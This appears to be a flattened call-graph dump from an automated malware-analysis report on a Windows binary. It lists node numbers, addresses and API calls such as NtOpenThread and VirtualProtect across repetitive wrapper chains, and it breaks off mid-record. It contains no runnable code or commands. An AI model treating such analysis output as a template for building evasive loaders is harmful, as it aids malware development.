3438 7ff67c751394 2 API calls 3437->3438 3439 7ff67c751512 3438->3439 3440 7ff67c751394 2 API calls 3439->3440 3441 7ff67c751521 3440->3441 3442 7ff67c751394 2 API calls 3441->3442 3443 7ff67c751530 3442->3443 3444 7ff67c751394 2 API calls 3443->3444 3445 7ff67c75153f 3444->3445 3446 7ff67c751394 2 API calls 3445->3446 3447 7ff67c75154e 3446->3447 3448 7ff67c751394 2 API calls 3447->3448 3449 7ff67c75155d 3448->3449 3450 7ff67c751394 2 API calls 3449->3450 3451 7ff67c75156c 3450->3451 3452 7ff67c751394 2 API calls 3451->3452 3453 7ff67c75157b 3452->3453 3454 7ff67c751394 2 API calls 3453->3454 3455 7ff67c75158a 3454->3455 3456 7ff67c751394 2 API calls 3455->3456 3457 7ff67c751599 3456->3457 3458 7ff67c751394 2 API calls 3457->3458 3459 7ff67c7515a8 3458->3459 3460 7ff67c751394 2 API calls 3459->3460 3461 7ff67c7515b7 3460->3461 3462 7ff67c7515c6 3461->3462 3463 7ff67c751394 2 API calls 3461->3463 3464 7ff67c751394 2 API calls 3462->3464 3463->3462 3465 7ff67c7515d0 3464->3465 3466 7ff67c7515d5 3465->3466 3467 7ff67c751394 2 API calls 3465->3467 3468 7ff67c751394 2 API calls 3466->3468 3467->3466 3469 7ff67c7515df 3468->3469 3470 7ff67c7515e4 3469->3470 3471 7ff67c751394 2 API calls 3469->3471 3472 7ff67c751394 2 API calls 3470->3472 3471->3470 3473 7ff67c7515f3 3472->3473 3473->2823 3475 7ff67c752f88 3474->3475 3476 7ff67c7514a9 2 API calls 3475->3476 3477 7ff67c752fd0 3476->3477 3477->2798 3479 7ff67c752690 10 API calls 3478->3479 3480 7ff67c75391e 3479->3480 3481 7ff67c753b21 3480->3481 3482 7ff67c7514a9 2 API calls 3480->3482 3481->2807 3483 7ff67c753967 3482->3483 3484 7ff67c753b28 3483->3484 3842 7ff67c7514b8 3483->3842 4095 7ff67c7515c6 3484->4095 3487 7ff67c753a87 memset 3906 7ff67c75148b 3487->3906 3489 7ff67c7514b8 2 API calls 3491 7ff67c75398f 3489->3491 3491->3487 3491->3489 3899 7ff67c7515d5 3491->3899 3495 7ff67c7514b8 2 API calls 3496 7ff67c753b07 3495->3496 3496->3484 3497 7ff67c753b0b 3496->3497 4030 7ff67c75147c 3497->4030 3500 7ff67c75145e 2 API calls 3500->3481 3502 7ff67c758410 malloc 3501->3502 3503 7ff67c7513b8 3502->3503 3504 7ff67c7513c6 NtOpenThread 3503->3504 3504->2866 3506 7ff67c75266f memset 3505->3506 3506->3035 3575 7ff67c75155d 3507->3575 3509 7ff67c7527f4 3510 7ff67c7514c7 2 API calls 3509->3510 3513 7ff67c752816 3510->3513 3512 7ff67c752785 wcsncmp 3600 7ff67c7514e5 3512->3600 3515 7ff67c751503 2 API calls 3513->3515 3516 7ff67c75283d 3515->3516 3518 7ff67c752847 memset 3516->3518 3517 7ff67c752d27 3519 7ff67c752877 3518->3519 3520 7ff67c7528bc wcscpy wcscat wcslen 3519->3520 3521 7ff67c75291a 3520->3521 3522 7ff67c7528ee wcslen 3520->3522 3523 7ff67c752967 wcslen 3521->3523 3526 7ff67c752985 3521->3526 3522->3521 3523->3526 3524 7ff67c7529d9 wcslen 3525 7ff67c7514a9 2 API calls 3524->3525 3527 7ff67c752a73 3525->3527 3526->3517 3526->3524 3528 7ff67c7514a9 2 API calls 3527->3528 3529 7ff67c752bd2 3528->3529 3647 7ff67c7514f4 3529->3647 3532 7ff67c7514c7 2 API calls 3533 7ff67c752c99 3532->3533 3534 7ff67c7514c7 2 API calls 3533->3534 3535 7ff67c752cb1 3534->3535 3536 7ff67c75145e 2 API calls 3535->3536 3537 7ff67c752cbb 3536->3537 3538 7ff67c75145e 2 API calls 3537->3538 3539 7ff67c752cc5 3538->3539 3539->3029 3541 7ff67c751394 2 API calls 3540->3541 3542 7ff67c751521 3541->3542 3543 7ff67c751394 2 API calls 3542->3543 3544 7ff67c751530 3543->3544 3545 7ff67c751394 2 API calls 3544->3545 3546 7ff67c75153f 3545->3546 3547 7ff67c751394 2 API calls 3546->3547 3548 7ff67c75154e 3547->3548 3549 7ff67c751394 2 API calls 3548->3549 3550 7ff67c75155d 3549->3550 3551 7ff67c751394 2 API calls 3550->3551 3552 7ff67c75156c 3551->3552 3553 7ff67c751394 2 API calls 3552->3553 3554 7ff67c75157b 3553->3554 3555 7ff67c751394 2 API calls 3554->3555 3556 7ff67c75158a 3555->3556 3557 7ff67c751394 2 API calls 3556->3557 3558 7ff67c751599 3557->3558 3559 7ff67c751394 2 API calls 3558->3559 3560 7ff67c7515a8 3559->3560 3561 7ff67c751394 2 API calls 3560->3561 3562 7ff67c7515b7 3561->3562 3563 7ff67c7515c6 3562->3563 3564 7ff67c751394 2 API calls 3562->3564 3565 7ff67c751394 2 API calls 3563->3565 3564->3563 3566 7ff67c7515d0 3565->3566 3567 7ff67c7515d5 3566->3567 3568 7ff67c751394 2 API calls 3566->3568 3569 7ff67c751394 2 API calls 3567->3569 3568->3567 3570 7ff67c7515df 3569->3570 3571 7ff67c7515e4 3570->3571 3572 7ff67c751394 2 API calls 3570->3572 3573 7ff67c751394 2 API calls 3571->3573 3572->3571 3574 7ff67c7515f3 3573->3574 3574->3031 3576 7ff67c751394 2 API calls 3575->3576 3577 7ff67c75156c 3576->3577 3578 7ff67c751394 2 API calls 3577->3578 3579 7ff67c75157b 3578->3579 3580 7ff67c751394 2 API calls 3579->3580 3581 7ff67c75158a 3580->3581 3582 7ff67c751394 2 API calls 3581->3582 3583 7ff67c751599 3582->3583 3584 7ff67c751394 2 API calls 3583->3584 3585 7ff67c7515a8 3584->3585 3586 7ff67c751394 2 API calls 3585->3586 3587 7ff67c7515b7 3586->3587 3588 7ff67c7515c6 3587->3588 3589 7ff67c751394 2 API calls 3587->3589 3590 7ff67c751394 2 API calls 3588->3590 3589->3588 3591 7ff67c7515d0 3590->3591 3592 7ff67c7515d5 3591->3592 3593 7ff67c751394 2 API calls 3591->3593 3594 7ff67c751394 2 API calls 3592->3594 3593->3592 3595 7ff67c7515df 3594->3595 3596 7ff67c7515e4 3595->3596 3597 7ff67c751394 2 API calls 3595->3597 3598 7ff67c751394 2 API calls 3596->3598 3597->3596 3599 7ff67c7515f3 3598->3599 3599->3509 3599->3512 3599->3517 3601 7ff67c751394 2 API calls 3600->3601 3602 7ff67c7514ef 3601->3602 3603 7ff67c7514f4 3602->3603 3604 7ff67c751394 2 API calls 3602->3604 3605 7ff67c751394 2 API calls 3603->3605 3604->3603 3606 7ff67c7514fe 3605->3606 3607 7ff67c751503 3606->3607 3608 7ff67c751394 2 API calls 3606->3608 3609 7ff67c751394 2 API calls 3607->3609 3608->3607 3610 7ff67c75150d 3609->3610 3611 7ff67c751394 2 API calls 3610->3611 3612 7ff67c751512 3611->3612 3613 7ff67c751394 2 API calls 3612->3613 3614 7ff67c751521 3613->3614 3615 7ff67c751394 2 API calls 3614->3615 3616 7ff67c751530 3615->3616 3617 7ff67c751394 2 API calls 3616->3617 3618 7ff67c75153f 3617->3618 3619 7ff67c751394 2 API calls 3618->3619 3620 7ff67c75154e 3619->3620 3621 7ff67c751394 2 API calls 3620->3621 3622 7ff67c75155d 3621->3622 3623 7ff67c751394 2 API calls 3622->3623 3624 7ff67c75156c 3623->3624 3625 7ff67c751394 2 API calls 3624->3625 3626 7ff67c75157b 3625->3626 3627 7ff67c751394 2 API calls 3626->3627 3628 7ff67c75158a 3627->3628 3629 7ff67c751394 2 API calls 3628->3629 3630 7ff67c751599 3629->3630 3631 7ff67c751394 2 API calls 3630->3631 3632 7ff67c7515a8 3631->3632 3633 7ff67c751394 2 API calls 3632->3633 3634 7ff67c7515b7 3633->3634 3635 7ff67c7515c6 3634->3635 3636 7ff67c751394 2 API calls 3634->3636 3637 7ff67c751394 2 API calls 3635->3637 3636->3635 3638 7ff67c7515d0 3637->3638 3639 7ff67c7515d5 3638->3639 3640 7ff67c751394 2 API calls 3638->3640 3641 7ff67c751394 2 API calls 3639->3641 3640->3639 3642 7ff67c7515df 3641->3642 3643 7ff67c7515e4 3642->3643 3644 7ff67c751394 2 API calls 3642->3644 3645 7ff67c751394 2 API calls 3643->3645 3644->3643 3646 7ff67c7515f3 3645->3646 3646->3509 3648 7ff67c751394 2 API calls 3647->3648 3649 7ff67c7514fe 3648->3649 3650 7ff67c751503 3649->3650 3651 7ff67c751394 2 API calls 3649->3651 3652 7ff67c751394 2 API calls 3650->3652 3651->3650 3653 7ff67c75150d 3652->3653 3654 7ff67c751394 2 API calls 3653->3654 3655 7ff67c751512 3654->3655 3656 7ff67c751394 2 API calls 3655->3656 3657 7ff67c751521 3656->3657 3658 7ff67c751394 2 API calls 3657->3658 3659 7ff67c751530 3658->3659 3660 7ff67c751394 2 API calls 3659->3660 3661 7ff67c75153f 3660->3661 3662 7ff67c751394 2 API calls 3661->3662 3663 7ff67c75154e 3662->3663 3664 7ff67c751394 2 API calls 3663->3664 3665 7ff67c75155d 3664->3665 3666 7ff67c751394 2 API calls 3665->3666 3667 7ff67c75156c 3666->3667 3668 7ff67c751394 2 API calls 3667->3668 3669 7ff67c75157b 3668->3669 3670 7ff67c751394 2 API calls 3669->3670 3671 7ff67c75158a 3670->3671 3672 7ff67c751394 2 API calls 3671->3672 3673 7ff67c751599 3672->3673 3674 7ff67c751394 2 API calls 3673->3674 3675 7ff67c7515a8 3674->3675 3676 7ff67c751394 2 API calls 3675->3676 3677 7ff67c7515b7 3676->3677 3678 7ff67c7515c6 3677->3678 3679 7ff67c751394 2 API calls 3677->3679 3680 7ff67c751394 2 API calls 3678->3680 3679->3678 3681 7ff67c7515d0 3680->3681 3682 7ff67c7515d5 3681->3682 3683 7ff67c751394 2 API calls 3681->3683 3684 7ff67c751394 2 API calls 3682->3684 3683->3682 3685 7ff67c7515df 3684->3685 3686 7ff67c7515e4 3685->3686 3687 7ff67c751394 2 API calls 3685->3687 3688 7ff67c751394 2 API calls 3686->3688 3687->3686 3689 7ff67c7515f3 3688->3689 3689->3532 3691 7ff67c751394 2 API calls 3690->3691 3692 7ff67c751431 3691->3692 3693 7ff67c751394 2 API calls 3692->3693 3694 7ff67c751440 3693->3694 3695 7ff67c751394 2 API calls 3694->3695 3696 7ff67c75144f 3695->3696 3697 7ff67c751394 2 API calls 3696->3697 3698 7ff67c75145e 3697->3698 3699 7ff67c751394 2 API calls 3698->3699 3700 7ff67c75146d 3699->3700 3701 7ff67c751394 2 API calls 3700->3701 3702 7ff67c75147c 3701->3702 3703 7ff67c751394 2 API calls 3702->3703 3704 7ff67c75148b 3703->3704 3705 7ff67c751394 2 API calls 3704->3705 3706 7ff67c75149a 3705->3706 3707 7ff67c751394 2 API calls 3706->3707 3708 7ff67c7514a9 3707->3708 3709 7ff67c7514b8 3708->3709 3710 7ff67c751394 2 API calls 3708->3710 3711 7ff67c751394 2 API calls 3709->3711 3710->3709 3712 7ff67c7514c2 3711->3712 3713 7ff67c7514c7 3712->3713 3714 7ff67c751394 2 API calls 3712->3714 3715 7ff67c751394 2 API calls 3713->3715 3714->3713 3716 7ff67c7514d6 3715->3716 3717 7ff67c751394 2 API calls 3716->3717 3718 7ff67c7514e0 3717->3718 3719 7ff67c7514e5 3718->3719 3720 7ff67c751394 2 API calls 3718->3720 3721 7ff67c751394 2 API calls 3719->3721 3720->3719 3722 7ff67c7514ef 3721->3722 3723 7ff67c7514f4 3722->3723 3724 7ff67c751394 2 API calls 3722->3724 3725 7ff67c751394 2 API calls 3723->3725 3724->3723 3726 7ff67c7514fe 3725->3726 3727 7ff67c751503 3726->3727 3728 7ff67c751394 2 API calls 3726->3728 3729 7ff67c751394 2 API calls 3727->3729 3728->3727 3730 7ff67c75150d 3729->3730 3731 7ff67c751394 2 API calls 3730->3731 3732 7ff67c751512 3731->3732 3733 7ff67c751394 2 API calls 3732->3733 3734 7ff67c751521 3733->3734 3735 7ff67c751394 2 API calls 3734->3735 3736 7ff67c751530 3735->3736 3737 7ff67c751394 2 API calls 3736->3737 3738 7ff67c75153f 3737->3738 3739 7ff67c751394 2 API calls 3738->3739 3740 7ff67c75154e 3739->3740 3741 7ff67c751394 2 API calls 3740->3741 3742 7ff67c75155d 3741->3742 3743 7ff67c751394 2 API calls 3742->3743 3744 7ff67c75156c 3743->3744 3745 7ff67c751394 2 API calls 3744->3745 3746 7ff67c75157b 3745->3746 3747 7ff67c751394 2 API calls 3746->3747 3748 7ff67c75158a 3747->3748 3749 7ff67c751394 2 API calls 3748->3749 3750 7ff67c751599 3749->3750 3751 7ff67c751394 2 API calls 3750->3751 3752 7ff67c7515a8 3751->3752 3753 7ff67c751394 2 API calls 3752->3753 3754 7ff67c7515b7 3753->3754 3755 7ff67c7515c6 3754->3755 3756 7ff67c751394 2 API calls 3754->3756 3757 7ff67c751394 2 API calls 3755->3757 3756->3755 3758 7ff67c7515d0 3757->3758 3759 7ff67c7515d5 3758->3759 3760 7ff67c751394 2 API calls 3758->3760 3761 7ff67c751394 2 API calls 3759->3761 3760->3759 3762 7ff67c7515df 3761->3762 3763 7ff67c7515e4 3762->3763 3764 7ff67c751394 2 API calls 3762->3764 3765 7ff67c751394 2 API calls 3763->3765 3764->3763 3766 7ff67c7515f3 3765->3766 3766->3415 3768 7ff67c751394 2 API calls 3767->3768 3769 7ff67c751440 3768->3769 3770 7ff67c751394 2 API calls 3769->3770 3771 7ff67c75144f 3770->3771 3772 7ff67c751394 2 API calls 3771->3772 3773 7ff67c75145e 3772->3773 3774 7ff67c751394 2 API calls 3773->3774 3775 7ff67c75146d 3774->3775 3776 7ff67c751394 2 API calls 3775->3776 3777 7ff67c75147c 3776->3777 3778 7ff67c751394 2 API calls 3777->3778 3779 7ff67c75148b 3778->3779 3780 7ff67c751394 2 API calls 3779->3780 3781 7ff67c75149a 3780->3781 3782 7ff67c751394 2 API calls 3781->3782 3783 7ff67c7514a9 3782->3783 3784 7ff67c7514b8 3783->3784 3785 7ff67c751394 2 API calls 3783->3785 3786 7ff67c751394 2 API calls 3784->3786 3785->3784 3787 7ff67c7514c2 3786->3787 3788 7ff67c7514c7 3787->3788 3789 7ff67c751394 2 API calls 3787->3789 3790 7ff67c751394 2 API calls 3788->3790 3789->3788 3791 7ff67c7514d6 3790->3791 3792 7ff67c751394 2 API calls 3791->3792 3793 7ff67c7514e0 3792->3793 3794 7ff67c7514e5 3793->3794 3795 7ff67c751394 2 API calls 3793->3795 3796 7ff67c751394 2 API calls 3794->3796 3795->3794 3797 7ff67c7514ef 3796->3797 3798 7ff67c7514f4 3797->3798 3799 7ff67c751394 2 API calls 3797->3799 3800 7ff67c751394 2 API calls 3798->3800 3799->3798 3801 7ff67c7514fe 3800->3801 3802 7ff67c751503 3801->3802 3803 7ff67c751394 2 API calls 3801->3803 3804 7ff67c751394 2 API calls 3802->3804 3803->3802 3805 7ff67c75150d 3804->3805 3806 7ff67c751394 2 API calls 3805->3806 3807 7ff67c751512 3806->3807 3808 7ff67c751394 2 API calls 3807->3808 3809 7ff67c751521 3808->3809 3810 7ff67c751394 2 API calls 3809->3810 3811 7ff67c751530 3810->3811 3812 7ff67c751394 2 API calls 3811->3812 3813 7ff67c75153f 3812->3813 3814 7ff67c751394 2 API calls 3813->3814 3815 7ff67c75154e 3814->3815 3816 7ff67c751394 2 API calls 3815->3816 3817 7ff67c75155d 3816->3817 3818 7ff67c751394 2 API calls 3817->3818 3819 7ff67c75156c 3818->3819 3820 7ff67c751394 2 API calls 3819->3820 3821 7ff67c75157b 3820->3821 3822 7ff67c751394 2 API calls 3821->3822 3823 7ff67c75158a 3822->3823 3824 7ff67c751394 2 API calls 3823->3824 3825 7ff67c751599 3824->3825 3826 7ff67c751394 2 API calls 3825->3826 3827 7ff67c7515a8 3826->3827 3828 7ff67c751394 2 API calls 3827->3828 3829 7ff67c7515b7 3828->3829 3830 7ff67c7515c6 3829->3830 3831 7ff67c751394 2 API calls 3829->3831 3832 7ff67c751394 2 API calls 3830->3832 3831->3830 3833 7ff67c7515d0 3832->3833 3834 7ff67c7515d5 3833->3834 3835 7ff67c751394 2 API calls 3833->3835 3836 7ff67c751394 2 API calls 3834->3836 3835->3834 3837 7ff67c7515df 3836->3837 3838 7ff67c7515e4 3837->3838 3839 7ff67c751394 2 API calls 3837->3839 3840 7ff67c751394 2 API calls 3838->3840 3839->3838 3841 7ff67c7515f3 3840->3841 3841->3419 3843 7ff67c751394 2 API calls 3842->3843 3844 7ff67c7514c2 3843->3844 3845 7ff67c7514c7 3844->3845 3846 7ff67c751394 2 API calls 3844->3846 3847 7ff67c751394 2 API calls 3845->3847 3846->3845 3848 7ff67c7514d6 3847->3848 3849 7ff67c751394 2 API calls 3848->3849 3850 7ff67c7514e0 3849->3850 3851 7ff67c7514e5 3850->3851 3852 7ff67c751394 2 API calls 3850->3852 3853 7ff67c751394 2 API calls 3851->3853 3852->3851 3854 7ff67c7514ef 3853->3854 3855 7ff67c7514f4 3854->3855 3856 7ff67c751394 2 API calls 3854->3856 3857 7ff67c751394 2 API calls 3855->3857 3856->3855 3858 7ff67c7514fe 3857->3858 3859 7ff67c751503 3858->3859 3860 7ff67c751394 2 API calls 3858->3860 3861 7ff67c751394 2 API calls 3859->3861 3860->3859 3862 7ff67c75150d 3861->3862 3863 7ff67c751394 2 API calls 3862->3863 3864 7ff67c751512 3863->3864 3865 7ff67c751394 2 API calls 3864->3865 3866 7ff67c751521 3865->3866 3867 7ff67c751394 2 API calls 3866->3867 3868 7ff67c751530 3867->3868 3869 7ff67c751394 2 API calls 3868->3869 3870 7ff67c75153f 3869->3870 3871 7ff67c751394 2 API calls 3870->3871 3872 7ff67c75154e 3871->3872 3873 7ff67c751394 2 API calls 3872->3873 3874 7ff67c75155d 3873->3874 3875 7ff67c751394 2 API calls 3874->3875 3876 7ff67c75156c 3875->3876 3877 7ff67c751394 2 API calls 3876->3877 3878 7ff67c75157b 3877->3878 3879 7ff67c751394 2 API calls 3878->3879 3880 7ff67c75158a 3879->3880 3881 7ff67c751394 2 API calls 3880->3881 3882 7ff67c751599 3881->3882 3883 7ff67c751394 2 API calls 3882->3883 3884 7ff67c7515a8 3883->3884 3885 7ff67c751394 2 API calls 3884->3885 3886 7ff67c7515b7 3885->3886 3887 7ff67c7515c6 3886->3887 3888 7ff67c751394 2 API calls 3886->3888 3889 7ff67c751394 2 API calls 3887->3889 3888->3887 3890 7ff67c7515d0 3889->3890 3891 7ff67c7515d5 3890->3891 3892 7ff67c751394 2 API calls 3890->3892 3893 7ff67c751394 2 API calls 3891->3893 3892->3891 3894 7ff67c7515df 3893->3894 3895 7ff67c7515e4 3894->3895 3896 7ff67c751394 2 API calls 3894->3896 3897 7ff67c751394 2 API calls 3895->3897 3896->3895 3898 7ff67c7515f3 3897->3898 3898->3491 3900 7ff67c751394 2 API calls 3899->3900 3901 7ff67c7515df 3900->3901 3902 7ff67c7515e4 3901->3902 3903 7ff67c751394 2 API calls 3901->3903 3904 7ff67c751394 2 API calls 3902->3904 3903->3902 3905 7ff67c7515f3 3904->3905 3905->3491 3907 7ff67c751394 2 API calls 3906->3907 3908 7ff67c75149a 3907->3908 3909 7ff67c751394 2 API calls 3908->3909 3910 7ff67c7514a9 3909->3910 3911 7ff67c7514b8 3910->3911 3912 7ff67c751394 2 API calls 3910->3912 3913 7ff67c751394 2 API calls 3911->3913 3912->3911 3914 7ff67c7514c2 3913->3914 3915 7ff67c7514c7 3914->3915 3916 7ff67c751394 2 API calls 3914->3916 3917 7ff67c751394 2 API calls 3915->3917 3916->3915 3918 7ff67c7514d6 3917->3918 3919 7ff67c751394 2 API calls 3918->3919 3920 7ff67c7514e0 3919->3920 3921 7ff67c7514e5 3920->3921 3922 7ff67c751394 2 API calls 3920->3922 3923 7ff67c751394 2 API calls 3921->3923 3922->3921 3924 7ff67c7514ef 3923->3924 3925 7ff67c7514f4 3924->3925 3926 7ff67c751394 2 API calls 3924->3926 3927 7ff67c751394 2 API calls 3925->3927 3926->3925 3928 7ff67c7514fe 3927->3928 3929 7ff67c751503 3928->3929 3930 7ff67c751394 2 API calls 3928->3930 3931 7ff67c751394 2 API calls 3929->3931 3930->3929 3932 7ff67c75150d 3931->3932 3933 7ff67c751394 2 API calls 3932->3933 3934 7ff67c751512 3933->3934 3935 7ff67c751394 2 API calls 3934->3935 3936 7ff67c751521 3935->3936 3937 7ff67c751394 2 API calls 3936->3937 3938 7ff67c751530 3937->3938 3939 7ff67c751394 2 API calls 3938->3939 3940 7ff67c75153f 3939->3940 3941 7ff67c751394 2 API calls 3940->3941 3942 7ff67c75154e 3941->3942 3943 7ff67c751394 2 API calls 3942->3943 3944 7ff67c75155d 3943->3944 3945 7ff67c751394 2 API calls 3944->3945 3946 7ff67c75156c 3945->3946 3947 7ff67c751394 2 API calls 3946->3947 3948 7ff67c75157b 3947->3948 3949 7ff67c751394 2 API calls 3948->3949 3950 7ff67c75158a 3949->3950 3951 7ff67c751394 2 API calls 3950->3951 3952 7ff67c751599 3951->3952 3953 7ff67c751394 2 API calls 3952->3953 3954 7ff67c7515a8 3953->3954 3955 7ff67c751394 2 API calls 3954->3955 3956 7ff67c7515b7 3955->3956 3957 7ff67c7515c6 3956->3957 3958 7ff67c751394 2 API calls 3956->3958 3959 7ff67c751394 2 API calls 3957->3959 3958->3957 3960 7ff67c7515d0 3959->3960 3961 7ff67c7515d5 3960->3961 3962 7ff67c751394 2 API calls 3960->3962 3963 7ff67c751394 2 API calls 3961->3963 3962->3961 3964 7ff67c7515df 3963->3964 3965 7ff67c7515e4 3964->3965 3966 7ff67c751394 2 API calls 3964->3966 3967 7ff67c751394 2 API calls 3965->3967 3966->3965 3968 7ff67c7515f3 3967->3968 3968->3484 3969 7ff67c75149a 3968->3969 3970 7ff67c751394 2 API calls 3969->3970 3971 7ff67c7514a9 3970->3971 3972 7ff67c7514b8 3971->3972 3973 7ff67c751394 2 API calls 3971->3973 3974 7ff67c751394 2 API calls 3972->3974 3973->3972 3975 7ff67c7514c2 3974->3975 3976 7ff67c7514c7 3975->3976 3977 7ff67c751394 2 API calls 3975->3977 3978 7ff67c751394 2 API calls 3976->3978 3977->3976 3979 7ff67c7514d6 3978->3979 3980 7ff67c751394 2 API calls 3979->3980 3981 7ff67c7514e0 3980->3981 3982 7ff67c7514e5 3981->3982 3983 7ff67c751394 2 API calls 3981->3983 3984 7ff67c751394 2 API calls 3982->3984 3983->3982 3985 7ff67c7514ef 3984->3985 3986 7ff67c7514f4 3985->3986 3987 7ff67c751394 2 API calls 3985->3987 3988 7ff67c751394 2 API calls 3986->3988 3987->3986 3989 7ff67c7514fe 3988->3989 3990 7ff67c751503 3989->3990 3991 7ff67c751394 2 API calls 3989->3991 3992 7ff67c751394 2 API calls 3990->3992 3991->3990 3993 7ff67c75150d 3992->3993 3994 7ff67c751394 2 API calls 3993->3994 3995 7ff67c751512 3994->3995 3996 7ff67c751394 2 API calls 3995->3996 3997 7ff67c751521 3996->3997 3998 7ff67c751394 2 API calls 3997->3998 3999 7ff67c751530 3998->3999 4000 7ff67c751394 2 API calls 3999->4000 4001 7ff67c75153f 4000->4001 4002 7ff67c751394 2 API calls 4001->4002 4003 7ff67c75154e 4002->4003 4004 7ff67c751394 2 API calls 4003->4004 4005 7ff67c75155d 4004->4005 4006 7ff67c751394 2 API calls 4005->4006 4007 7ff67c75156c 4006->4007 4008 7ff67c751394 2 API calls 4007->4008 4009 7ff67c75157b 4008->4009 4010 7ff67c751394 2 API calls 4009->4010 4011 7ff67c75158a 4010->4011 4012 7ff67c751394 2 API calls 4011->4012 4013 7ff67c751599 4012->4013 4014 7ff67c751394 2 API calls 4013->4014 4015 7ff67c7515a8 4014->4015 4016 7ff67c751394 2 API calls 4015->4016 4017 7ff67c7515b7 4016->4017 4018 7ff67c7515c6 4017->4018 4019 7ff67c751394 2 API calls 4017->4019 4020 7ff67c751394 2 API calls 4018->4020 4019->4018 4021 7ff67c7515d0 4020->4021 4022 7ff67c7515d5 4021->4022 4023 7ff67c751394 2 API calls 4021->4023 4024 7ff67c751394 2 API calls 4022->4024 4023->4022 4025 7ff67c7515df 4024->4025 4026 7ff67c7515e4 4025->4026 4027 7ff67c751394 2 API calls 4025->4027 4028 7ff67c751394 2 API calls 4026->4028 4027->4026 4029 7ff67c7515f3 4028->4029 4029->3484 4029->3495 4031 7ff67c751394 2 API calls 4030->4031 4032 7ff67c75148b 4031->4032 4033 7ff67c751394 2 API calls 4032->4033 4034 7ff67c75149a 4033->4034 4035 7ff67c751394 2 API calls 4034->4035 4036 7ff67c7514a9 4035->4036 4037 7ff67c7514b8 4036->4037 4038 7ff67c751394 2 API calls 4036->4038 4039 7ff67c751394 2 API calls 4037->4039 4038->4037 4040 7ff67c7514c2 4039->4040 4041 7ff67c7514c7 4040->4041 4042 7ff67c751394 2 API calls 4040->4042 4043 7ff67c751394 2 API calls 4041->4043 4042->4041 4044 7ff67c7514d6 4043->4044 4045 7ff67c751394 2 API calls 4044->4045 4046 7ff67c7514e0 4045->4046 4047 7ff67c7514e5 4046->4047 4048 7ff67c751394 2 API calls 4046->4048 4049 7ff67c751394 2 API calls 4047->4049 4048->4047 4050 7ff67c7514ef 4049->4050 4051 7ff67c7514f4 4050->4051 4052 7ff67c751394 2 API calls 4050->4052 4053 7ff67c751394 2 API calls 4051->4053 4052->4051 4054 7ff67c7514fe 4053->4054 4055 7ff67c751503 4054->4055 4056 7ff67c751394 2 API calls 4054->4056 4057 7ff67c751394 2 API calls 4055->4057 4056->4055 4058 7ff67c75150d 4057->4058 4059 7ff67c751394 2 API calls 4058->4059 4060 7ff67c751512 4059->4060 4061 7ff67c751394 2 API calls 4060->4061 4062 7ff67c751521 4061->4062 4063 7ff67c751394 2 API calls 4062->4063 4064 7ff67c751530 4063->4064 4065 7ff67c751394 2 API calls 4064->4065 4066 7ff67c75153f 4065->4066 4067 7ff67c751394 2 API calls 4066->4067 4068 7ff67c75154e 4067->4068 4069 7ff67c751394 2 API calls 4068->4069 4070 7ff67c75155d 4069->4070 4071 7ff67c751394 2 API calls 4070->4071 4072 7ff67c75156c 4071->4072 4073 7ff67c751394 2 API calls 4072->4073 4074 7ff67c75157b 4073->4074 4075 7ff67c751394 2 API calls 4074->4075 4076 7ff67c75158a 4075->4076 4077 7ff67c751394 2 API calls 4076->4077 4078 7ff67c751599 4077->4078 4079 7ff67c751394 2 API calls 4078->4079 4080 7ff67c7515a8 4079->4080 4081 7ff67c751394 2 API calls 4080->4081 4082 7ff67c7515b7 4081->4082 4083 7ff67c7515c6 4082->4083 4084 7ff67c751394 2 API calls 4082->4084 4085 7ff67c751394 2 API calls 4083->4085 4084->4083 4086 7ff67c7515d0 4085->4086 4087 7ff67c7515d5 4086->4087 4088 7ff67c751394 2 API calls 4086->4088 4089 7ff67c751394 2 API calls 4087->4089 4088->4087 4090 7ff67c7515df 4089->4090 4091 7ff67c7515e4 4090->4091 4092 7ff67c751394 2 API calls 4090->4092 4093 7ff67c751394 2 API calls 4091->4093 4092->4091 4094 7ff67c7515f3 4093->4094 4094->3500 4096 7ff67c751394 2 API calls 4095->4096 4097 7ff67c7515d0 4096->4097 4098 7ff67c7515d5 4097->4098 4099 7ff67c751394 2 API calls 4097->4099 4100 7ff67c751394 2 API calls 4098->4100 4099->4098 4101 7ff67c7515df 4100->4101 4102 7ff67c7515e4 4101->4102 4103 7ff67c751394 2 API calls 4101->4103 4104 7ff67c751394 2 API calls 4102->4104 4103->4102 4105 7ff67c7515f3 4104->4105 4105->3481 4174 7ff67c751800 4175 7ff67c751812 4174->4175 4176 7ff67c751835 fprintf 4175->4176 4177 7ff67c751000 4178 7ff67c75108b __set_app_type 4177->4178 4179 7ff67c751040 4177->4179 4180 7ff67c7510b6 4178->4180 4179->4178 4181 7ff67c7510e5 4180->4181 4183 7ff67c751e00 4180->4183 4184 7ff67c7589a0 __setusermatherr 4183->4184 4200 7ff67c752320 strlen 4201 7ff67c752337 4200->4201 4115 7ff67c751f47 4116 7ff67c751e67 signal 4115->4116 4119 7ff67c751e99 4115->4119 4117 7ff67c751e7c 4116->4117 4116->4119 4118 7ff67c751e82 signal 4117->4118 4117->4119 4118->4119 4202 7ff67c751ab3 4203 7ff67c751a70 4202->4203 4203->4202 4204 7ff67c75199e 4203->4204 4205 7ff67c751b36 4203->4205 4209 7ff67c751b5c 4203->4209 4206 7ff67c751a0f 4204->4206 4210 7ff67c7519e9 VirtualProtect 4204->4210 4207 7ff67c751ba0 4 API calls 4205->4207 4208 7ff67c751b53 4207->4208 4210->4204 2628 7ff67c751394 2632 7ff67c758410 2628->2632 2630 7ff67c7513b8 2631 7ff67c7513c6 NtOpenThread 2630->2631 2633 7ff67c75842e 2632->2633 2636 7ff67c75845b 2632->2636 2633->2630 2634 7ff67c758503 2635 7ff67c75851f malloc 2634->2635 2637 7ff67c758540 2635->2637 2636->2633 2636->2634 2637->2633 4153 7ff67c75216f 4154 7ff67c752178 InitializeCriticalSection 4153->4154 4155 7ff67c752185 4153->4155 4154->4155 4129 7ff67c751fd0 4130 7ff67c752033 4129->4130 4131 7ff67c751fe4 4129->4131 4131->4130 4132 7ff67c751ffd EnterCriticalSection LeaveCriticalSection 4131->4132 4132->4130 4133 7ff67c752050 4134 7ff67c75205e EnterCriticalSection 4133->4134 4135 7ff67c7520cf 4133->4135 4136 7ff67c7520c2 LeaveCriticalSection 4134->4136 4137 7ff67c752079 4134->4137 4136->4135 4137->4136 4138 7ff67c7520bd free 4137->4138 4138->4136 4156 7ff67c751a70 4157 7ff67c751a7d 4156->4157 4158 7ff67c75199e 4156->4158 4157->4156 4161 7ff67c751b5c 4157->4161 4162 7ff67c751b36 4157->4162 4159 7ff67c751a0f 4158->4159 4160 